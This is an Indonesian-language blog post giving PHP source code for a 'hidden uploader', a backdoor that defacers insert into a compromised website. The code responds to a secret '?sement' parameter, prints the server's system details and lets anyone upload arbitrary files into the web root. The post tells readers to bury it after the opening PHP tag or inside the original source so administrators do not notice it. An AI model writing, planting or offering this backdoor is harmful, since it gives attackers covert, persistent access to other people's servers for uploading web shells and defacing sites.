Friday, May 18, 2018

[PHP] Hidden Uploader

  No comments


Assalamu'alaikum Wr Wb

Kali ini Saya akan membahas tentang Hidden Uploader,
Hidden Uploader biasanya di pasang oleh se orang defacer agar dia dapat menyembunyikan akses nya di dalam target nya.
Biasanya Hidden Uploader dipanggil dengan sebuah parameter

Langsung Saja Ini dia Source Code Hidden Uploader :


if(isset($_GET["sement"])){
echo "Home Root Hidden Uploader";
echo "<b>".php_uname()."</b><br>";
echo "<form method='post' enctype='multipart/form-data'><input type='file' name='idx_file'><input type='submit' name='upload' value='upload'></form>";
$root = $_SERVER['DOCUMENT_ROOT'];
$files = $_FILES['idx_file']['name'];
$dest = $root.'/'.$files;
if(isset($_POST['upload'])) {
if(is_writable($root)) {
if(@copy($_FILES['idx_file']['tmp_name'], $dest)) { $web = "http://".$_SERVER['HTTP_HOST']."/";
echo "sukses upload -> <a href='$web/$files' target='_blank'><b><u>$web/$files</u></b></a>"; } else {
echo "gagal upload di document root.";}
} else { if(@copy($_FILES['idx_file']['tmp_name'], $files)) { echo "sukses upload <b>$files</b> di folder ini";
} else {
echo "Gagal Cok";
}
}
}
}

Letakkan Source Code Diatas di setelah code <?php atau di tengah tengah Source Code Asli agar tidak gampang di ketahui oleh admin web

Cara Memanggil Uploader :

Contoh saya menaruh Uploader di file index.php Cara memanggil Uploader Nya adalah menambahkan Parameter ?sement di bagian setelah index.php yaitu menjadi index.php?sement



Sekian Artikel Kali ini Jika Ada yg salah saya mohon Maaf :)
Wasalamu'alaikum Wr Wb

No comments :

Post a Comment